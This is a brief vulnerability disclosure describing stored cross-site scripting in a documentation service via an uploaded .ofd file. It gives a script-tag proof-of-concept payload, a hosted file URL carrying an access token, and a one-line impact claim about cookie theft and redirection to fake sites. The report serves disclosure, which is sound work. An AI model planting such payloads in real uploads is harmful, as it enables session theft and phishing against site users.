Stored XSS via uploading file in .ofd format.
filename="test.ofd"
<script>alert(1)</script>
https://img.showdoc.cc/622f5237a4612_622f5237a4609.ofd?e=1647272323&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:0OnGqbEWkwJaFbR43A347gUCOMc=
An attacker can perform social engineering on users by redirecting them from a real website to a fake one. a hacker can steal their cookies etc.